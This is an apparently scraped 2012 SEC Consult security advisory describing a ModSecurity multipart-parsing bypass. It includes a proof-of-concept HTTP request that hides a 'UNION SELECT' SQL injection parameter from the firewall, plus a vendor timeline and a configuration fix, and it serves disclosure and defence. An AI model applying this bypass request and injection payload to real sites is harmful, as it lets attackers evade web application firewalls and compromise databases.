ModSecurity 2.6.8 Bypass

SEC Consult Vulnerability Lab Security Advisory < 20121017-0 >
=======================================================================
               title: ModSecurity multipart/invalid part ruleset bypass
             product: ModSecurity
  vulnerable version: <= 2.6.8
       fixed version: 2.7.0
          CVE number: -
              impact: Depends what you use it for
            homepage: http://www.modsecurity.org/
               found: 2012-10-12
                  by: Bernhard Mueller
                      SEC Consult Vulnerability Lab
                      https://www.sec-consult.com
=======================================================================
 
Vendor/product description:
---------------------------
ModSecurity for Apache is a web server plug-in for the Apache web server
platform. This is the original, most mature and deployed ModSecurity module.
This module is maintained by the Trustwave SpiderLabs Research Team.
 
URL: http://www.modsecurity.org/projects/modsecurity/apache/
 
 
Vulnerability overview/description:
-----------------------------------
Validation of POST parameters can be bypassed on Apache/PHP installations by
sending specially formed multipart requests. A POST parameter's content can be
hidden from ModSecurity by prepending an invalid part. This first part
contains only a Content-Disposition header and has an additional carriage
return inserted at the end of the line ([\r\r\n]). This is followed by a
boundary in the next line and another Content-Disposition header with a
filename. The request content looks like this (newlines are all \r\n except in
line 2).
 
--A
Content-Disposition: form-data; name="id"[\r][\r][\n]
--A
Content-Disposition: form-data; name="lol"; filename="x"
 
1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--
 
--A--
 
ModSecurity skips what it believes to be an invalid first part and proceeds to
parse the second part. This part is treated as a file and not checked against
the ruleset.
 
PHP however treats the whole thing as a single part and processes only the
first Content-Disposition header, ignoring the second one. In the opinion of
PHP this request contains a POST parameter with the name specified in the
first header.
 
 
Proof of concept:
-----------------
 
wut.php:
--------
 
<? echo $POST[xxx] ?>
 
 
POST request:
-------------
 
POST /wut.php HTTP/1.1
Content-Type: multipart/form-data; boundary=A
Content-Length: 161
 
--A
Content-Disposition: form-data; name="xxx"[\r][\r][\n]
--A
Content-Disposition: form-data; name="yyy"; filename="z"
 
1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--
 
--A--
 
 
Output:
-------
 
1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--
 
(any change in the header should produce a 403)
 
 
Vulnerable / tested versions:
-----------------------------
 
This works with ModSecurity up to version 2.6.8.
 
 
Vendor contact timeline:
------------------------
2012-10-11: Contacted ModSecurity
2012-10-15: ModSecurity guys fixed it
2012-10-16: New ModSecurity release 2.7.0
2012-10-17: Public release of advisory
 
 
Solution:
---------
To mitigate this bypass method, upgrade to ModSecurity 2.7.0 and make sure
that the MULTIPART_INVALID_PART flag is set in the multipart strict validation
rule. Add the line:
 
IQ %{MULTIPART_INVALID_PART}, \
 
to the SecRule MULTIPART_STRICT_ERROR in your ModSecurity configuration file.
 
Download is available at:
 
http://www.modsecurity.org/download/
 
 
 
Advisory URL:
--------------
https://www.sec-consult.com/en/advisories.html
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The SEC Consult Group
 
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com
 
 
Office Singapore
4 Battery Road
#25-01 Bank of China Building
Singapore (049908)
Mail: office at sec-consult dot sg
 
 
Check out our blog at:
http://blog.sec-consult.com/
 
 
And this thing here:
http://wordpress.org/extend/plugins/mvis-security-center/
 
 
EOF B. Mueller / October 2012

你可能感兴趣的:(apache,Security,Module,header,Office,Parameters)